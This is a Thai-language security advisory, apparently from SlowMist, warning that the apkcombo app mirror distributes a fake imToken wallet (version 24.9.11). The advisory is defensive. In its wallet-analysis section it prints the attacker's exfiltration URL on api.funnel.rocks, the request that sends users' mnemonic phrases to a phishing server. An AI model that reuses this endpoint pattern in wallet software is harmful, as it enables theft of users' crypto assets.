พื้นหลัง

พื้นหลัง

Web3 ที่ใช้เทคโนโลยีบล็อกเชนกำลังขับเคลื่อนการปฏิวัติทางเทคโนโลยียุคต่อไป และผู้คนจำนวนมากขึ้นก็เริ่มมีส่วนร่วมในคลื่นแห่งการเข้ารหัสนี้ แต่ Web3 และ Web2 เป็นโลกสองใบที่แตกต่างกันอย่างสิ้นเชิง โลก Web3 เป็นป่ามืดที่เต็มไปด้วยโอกาสและอันตรายต่างๆ ในโลก Web3 กระเป๋าเงินเป็นทางเข้าและผ่านเพื่อเข้าสู่โลก Web3

เมื่อคุณสำรวจและสัมผัสกับแอปพลิเคชั่นและเว็บไซต์ที่เกี่ยวข้องกับบล็อคเชนมากมายในโลก Web3 ผ่านกระเป๋าเงินของคุณ คุณจะพบว่าทุกแอปพลิเคชั่นในเครือข่ายสาธารณะใช้กระเป๋าเงินเพื่อ "เข้าสู่ระบบ" ซึ่งแตกต่างจากการเข้าสู่ระบบ "เข้าสู่ระบบ" แบบดั้งเดิมของเรา แตกต่างกัน ในโลก Web2 บัญชีระหว่างแต่ละแอปพลิเคชันไม่สามารถทำงานร่วมกันได้ทั้งหมด แต่ในโลกของ Web3 แอปพลิเคชันทั้งหมดใช้กระเป๋าเงินเพื่อ "เข้าสู่ระบบ" เหมือนกัน เราจะเห็นว่า "เข้าสู่ระบบด้วย Wallet" ไม่แสดงเมื่อ "ลงชื่อเข้าใช้" ไปที่กระเป๋าเงิน แต่ "เชื่อมต่อ Wallet" จะถูกแทนที่ และกระเป๋าเงินเป็นหนังสือเดินทางเดียวของคุณในโลก Web3

ต้องมีเงาอยู่ใต้ตึกสูง ในโลกของ Web3 ที่ร้อนแรง กระเป๋าสตางค์ซึ่งเป็นแอปพลิเคชันระดับเริ่มต้นมักตกเป็นเป้าหมายของห่วงโซ่อุตสาหกรรมสีดำและสีเทา

ชื่อระดับแรก

การวิเคราะห์เว็บไซต์

ในมุมมองของการดาวน์โหลดหลายวิธี วันนี้มาดู apkcombo เป็นตัวอย่าง Apkcombo เป็นตลาดแอปพลิเคชันของบุคคลที่สาม ตามคำแถลงอย่างเป็นทางการ แอปพลิเคชันส่วนใหญ่ที่ให้บริการมาจากร้านค้าแอปพลิเคชันอย่างเป็นทางการอื่นๆ แต่จริงหรือไม่

ก่อนอื่นมาดูกันว่าการรับส่งข้อมูลของ apkcombo นั้นใหญ่แค่ไหน:

ตามสถิติจากเว็บไซต์สถิติเว็บที่คล้ายกัน เว็บไซต์ apkcombo:

อันดับโลก: 1,809

อันดับประเทศ: 7,370

อันดับหมวดหมู่: 168

เราจะเห็นว่าอิทธิพลและทราฟฟิกของมันมีขนาดใหญ่มาก

มีปลั๊กอินดาวน์โหลด Chrome APK เป็นค่าเริ่มต้น และเราพบว่าจำนวนผู้ใช้ปลั๊กอินนี้มีถึง 10 W+:

ดังนั้นกลับไปที่ทิศทางกระเป๋าเงินในช่อง Web3 ที่เรากังวลว่าแอปพลิเคชันกระเป๋าเงินที่ผู้ใช้ดาวน์โหลดจากที่นี่ปลอดภัยเพียงใด

ยกตัวอย่างกระเป๋าเงิน imToken ที่รู้จักกันดี เส้นทางการดาวน์โหลดอย่างเป็นทางการของ Google Play คือ:

https://play.google.com/store/apps/details? id=im.token.app

เนื่องจากโทรศัพท์มือถือจำนวนมากไม่รองรับ Google Play หรือเนื่องจากปัญหาเครือข่าย หลายคนจะดาวน์โหลดแอปพลิเคชัน Google Play จากที่นี่

เส้นทางการดาวน์โหลดของสถานีมิเรอร์ apkcombo คือ:

https://apkcombo.com/downloader/#package=im.token.app

จากภาพด้านบน เราจะเห็นว่าเวอร์ชันที่จัดทำโดย apkcombo คือ 24.9.11 หลังจากการยืนยันโดย imToken นี่เป็นเวอร์ชันที่ไม่มีอยู่จริง! ได้รับการยืนยันแล้วว่านี่คือรุ่นที่มีกระเป๋าเงิน imToken ปลอมมากที่สุดในตลาดขณะนี้

ในขณะที่เขียนบทความนี้ imToken wallet เวอร์ชันล่าสุดคือ 2.11.3 หมายเลขเวอร์ชันของ wallet นี้สูงมาก และเห็นได้ชัดว่ามีการตั้งค่าให้หลอกว่าเป็นเวอร์ชันล่าสุด

ดังที่แสดงในภาพด้านล่าง เราพบใน apkcombo ว่าเวอร์ชันกระเป๋าเงินปลอมนี้แสดงปริมาณการดาวน์โหลดจำนวนมาก ปริมาณการดาวน์โหลดที่นี่ควรเป็นข้อมูลปริมาณการดาวน์โหลดที่รวบรวมข้อมูลจาก Google Play ด้วยเหตุผลด้านความปลอดภัย เรารู้สึกว่าจำเป็นต้องเปิดเผยแหล่งที่มา ของแอพที่เป็นอันตรายนี้ ป้องกันไม่ให้คนอื่นดาวน์โหลดกระเป๋าเงินปลอมนี้

ในขณะเดียวกัน เราพบว่ามีเว็บไซต์ดาวน์โหลดที่คล้ายกัน เช่น uptodown

ลิงค์ดาวน์โหลด: https://imtoken.br.uptodown.com/android

ชื่อระดับแรก

การวิเคราะห์กระเป๋าเงิน

เราได้วิเคราะห์กระเป๋าเงินปลอมหลายกรณีก่อนหน้านี้ เช่น: 2021-11-24 เราเปิดเผยว่า: "SlowMist: แอพกระเป๋าเงินปลอมทำให้ผู้คนหลายหมื่นคนถูกขโมย โดยสูญเสียมากถึง 1.3 พันล้านดอลลาร์สหรัฐ"ดังนั้นฉันจะไม่ลงรายละเอียดที่นี่

เราวิเคราะห์กระเป๋าเงินปลอมด้วยเวอร์ชัน 24.9.11 ที่จัดทำโดย apkcombo เท่านั้น เมื่อสร้างกระเป๋าเงินหรือนำเข้าตัวช่วยจำกระเป๋าเงินในอินเทอร์เฟซเริ่มต้น กระเป๋าเงินปลอมจะส่งข้อมูลช่วยจำและข้อมูลอื่น ๆ ไปยังเซิร์ฟเวอร์ของเว็บไซต์ฟิชชิ่งดังที่แสดงใน รูปด้านล่าง:

ตามรหัส APK ย้อนกลับและการวิเคราะห์จริงของแพ็กเก็ตการรับส่งข้อมูล วิธีการส่งข้อความช่วยจำมีดังนี้:

https://api.funnel.rocks/api/trust?aid= 10&wt= 1&os= 1&key=<ช่วยจำ>

เมื่อดูรูปด้านล่าง ใบรับรอง "api.funnel.rocks" แรกสุดปรากฏเมื่อวันที่ 2022-06-03 ซึ่งเป็นเวลาโดยประมาณที่เริ่มการโจมตี:

สรุป

สรุป

ในปัจจุบัน กิจกรรมการหลอกลวงประเภทนี้ไม่เพียงแต่มีการใช้งานเท่านั้น แต่ยังมีแนวโน้มที่จะขยายขอบเขตออกไปอีกด้วย และเหยื่อรายใหม่ก็ถูกหลอกทุกวัน ในฐานะที่เป็นจุดอ่อนที่สุดในระบบรักษาความปลอดภัย ผู้ใช้ควรสงสัยอยู่เสมอและเพิ่มความตระหนักด้านความปลอดภัยและความเสี่ยง เมื่อคุณใช้กระเป๋าเงินและการแลกเปลี่ยน โปรดมองหาช่องทางการดาวน์โหลดอย่างเป็นทางการและตรวจสอบจากหลายฝ่าย หากกระเป๋าเงินของคุณมาจากด้านบน มิเรอร์ โปรดโอนสินทรัพย์และถอนการติดตั้งซอฟต์แวร์โดยเร็วที่สุด และตรวจสอบผ่านช่องทางการตรวจสอบอย่างเป็นทางการหากจำเป็น

ในเวลาเดียวกัน หากคุณต้องการใช้กระเป๋าเงิน โปรดตรวจสอบให้แน่ใจว่าได้มองหาเว็บไซต์ทางการของแอพกระเป๋าเงินกระแสหลักต่อไปนี้:

1/กระเป๋าเงิน imToken:https://token.im/

2 /กระเป๋าสตางค์ TokenPocket:https://www.tokenpocket.pro/

3/กระเป๋าเงิน TronLink:https://www.tronlink.org/

4/กระเป๋าสตางค์ Bitpie:https://bitpie.com/

5/กระเป๋าสตางค์ MetaMask:https://metamask.io/

6 /Trust Wallet：https://trustwallet.com/

โปรดให้ความสนใจกับทีมรักษาความปลอดภัยของ SlowMist ต่อไป การวิเคราะห์ความเสี่ยงด้านความปลอดภัยของ Web3 และคำเตือนเพิ่มเติมกำลังดำเนินการอยู่

กิตติกรรมประกาศ: ขอขอบคุณ imToken สำหรับการสนับสนุนการตรวจสอบที่จัดทำโดยเจ้าหน้าที่ในระหว่างกระบวนการตรวจสอบย้อนกลับ

เนื่องจากความลับและความเป็นส่วนตัว บทความนี้เป็นเพียงส่วนเล็ก ๆ ของภูเขาน้ำแข็ง ในที่นี้ SlowMist แนะนำว่าผู้ใช้จำเป็นต้องเสริมความเข้าใจเกี่ยวกับความรู้ด้านความปลอดภัย เสริมความสามารถในการระบุการโจมตีแบบฟิชชิ่ง ฯลฯ เพื่อหลีกเลี่ยงการเผชิญกับการโจมตีดังกล่าว สำหรับความรู้ด้านความปลอดภัยเพิ่มเติม ขอแนะนำให้อ่าน Slow Mist's"คู่มือช่วยเหลือตนเองของ Blockchain Dark Forest"。